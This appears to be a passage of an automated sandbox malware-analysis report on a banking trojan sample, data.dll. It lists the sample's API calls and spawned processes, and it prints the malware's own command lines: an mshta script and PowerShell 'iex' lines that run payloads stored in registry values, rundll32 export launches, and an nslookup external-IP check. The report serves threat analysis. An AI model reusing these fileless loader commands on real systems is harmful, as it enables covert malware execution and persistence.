Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00972C07 49_2_00972C07
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097C5F4 49_2_0097C5F4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00965518 49_2_00965518
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096AD2E 49_2_0096AD2E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00974658 49_2_00974658
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096279B 49_2_0096279B
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456D1F8 CreateProcessAsUserW, 0_2_0456D1F8
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Tries to load missing DLLs
Source: C:\Windows\System32\loaddll32.exe Section loaded: mspdb140.dll Jump to behavior
Uses 32bit PE files
Source: data.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B121F NtMapViewOfSection, 0_2_6E4B121F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B1A1C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_6E4B1A1C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2013 GetProcAddress,NtCreateSection,memset, 0_2_6E4B2013
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B2495 NtQueryVirtualMemory, 0_2_6E4B2495
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_00DD22EC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD3C64 GetProcAddress,NtCreateSection,memset, 0_2_00DD3C64
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD37E0 NtMapViewOfSection, 0_2_00DD37E0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00DD8055 NtQueryVirtualMemory, 0_2_00DD8055
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_0456DE77
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04566EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 0_2_04566EB0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04567FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_04567FDD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04570FA5 NtQueryInformationProcess, 0_2_04570FA5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045692F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 0_2_045692F3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04575AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 0_2_04575AED
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04561305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 0_2_04561305
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04577419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 0_2_04577419
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457A42B NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0457A42B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045736C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 0_2_045736C0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04576F70 NtQuerySystemInformation,RtlNtStatusToDosError, 0_2_04576F70
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04564851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 0_2_04564851
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456D812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 0_2_0456D812
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0456D00C memset,NtQueryInformationProcess, 0_2_0456D00C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04564173 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_04564173
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04579180 NtGetContextThread,RtlNtStatusToDosError, 0_2_04579180
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457DBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 0_2_0457DBCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBA42B NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_04BBA42B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA6EB0 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 3_2_04BA6EB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB969C memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 3_2_04BB969C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BADE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_04BADE77
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB0FA5 NtQueryInformationProcess, 3_2_04BB0FA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA7FDD RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 3_2_04BA7FDD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB680B NtMapViewOfSection, 3_2_04BB680B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA4173 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_04BA4173
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA92F3 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 3_2_04BA92F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB5AED memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 3_2_04BB5AED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBA21F GetProcAddress,NtCreateSection,memset, 3_2_04BBA21F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA1305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 3_2_04BA1305
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB7419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 3_2_04BB7419
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB36C0 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 3_2_04BB36C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB6F70 NtQuerySystemInformation,RtlNtStatusToDosError, 3_2_04BB6F70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAD812 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 3_2_04BAD812
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BAD00C memset,NtQueryInformationProcess, 3_2_04BAD00C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BA4851 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 3_2_04BA4851
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB9180 NtGetContextThread,RtlNtStatusToDosError, 3_2_04BB9180
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBDBCE NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 3_2_04BBDBCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A722EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 5_2_04A722EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04A78055 NtQueryVirtualMemory, 5_2_04A78055
Source: C:\Windows\System32\control.exe Code function: 34_2_0092A8D4 NtWriteVirtualMemory, 34_2_0092A8D4
Source: C:\Windows\System32\control.exe Code function: 34_2_0092B92C NtReadVirtualMemory, 34_2_0092B92C
Source: C:\Windows\System32\control.exe Code function: 34_2_0093FAA8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 34_2_0093FAA8
Source: C:\Windows\System32\control.exe Code function: 34_2_009252DC NtMapViewOfSection, 34_2_009252DC
Source: C:\Windows\System32\control.exe Code function: 34_2_00921A58 NtQueryInformationToken,NtQueryInformationToken,NtClose, 34_2_00921A58
Source: C:\Windows\System32\control.exe Code function: 34_2_00922B08 NtQueryInformationProcess, 34_2_00922B08
Source: C:\Windows\System32\control.exe Code function: 34_2_0092A444 RtlAllocateHeap,NtQueryInformationProcess, 34_2_0092A444
Source: C:\Windows\System32\control.exe Code function: 34_2_00947DAC NtCreateSection, 34_2_00947DAC
Source: C:\Windows\System32\control.exe Code function: 34_2_00940DE0 NtAllocateVirtualMemory, 34_2_00940DE0
Source: C:\Windows\System32\control.exe Code function: 34_2_0093179C NtSetContextThread,NtUnmapViewOfSection,NtClose, 34_2_0093179C
Source: C:\Windows\System32\control.exe Code function: 34_2_0095F002 NtProtectVirtualMemory,NtProtectVirtualMemory, 34_2_0095F002
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C2B08 NtQueryInformationProcess, 45_2_000002D2D67C2B08
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67C1A58 NtQueryInformationToken,NtQueryInformationToken,NtClose, 45_2_000002D2D67C1A58
Source: C:\Windows\System32\rundll32.exe Code function: 45_2_000002D2D67FF002 NtProtectVirtualMemory,NtProtectVirtualMemory, 45_2_000002D2D67FF002
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00961305 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 49_2_00961305
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096DE77 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 49_2_0096DE77
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00970FA5 NtQueryInformationProcess, 49_2_00970FA5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00967FDD memset,CreateMutexA,CloseHandle,GetUserNameA,RtlAllocateHeap,NtQueryInformationProcess,OpenProcess,CloseHandle,memcpy,RtlAllocateHeap,OpenEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 49_2_00967FDD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096D812 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 49_2_0096D812
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0096D00C memset,NtQueryInformationProcess, 49_2_0096D00C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00977419 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 49_2_00977419
Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00976F70 NtQuerySystemInformation,RtlNtStatusToDosError, 49_2_00976F70
PE file does not import any functions
Source: aixojixg.dll.20.dr Static PE information: No import functions for PE file found
Source: keehvxm3.dll.24.dr Static PE information: No import functions for PE file found
Source: a52acufz.dll.19.dr Static PE information: No import functions for PE file found
Source: ddwuzigh.dll.23.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: data.dll Binary or memory string: OriginalFilenameSoon.dll8 vs data.dll
Source: data.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211007
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@53/41@12/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: data.dll Virustotal: Detection: 7%
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\data.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Father
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Father Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hr4en22c.pth.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
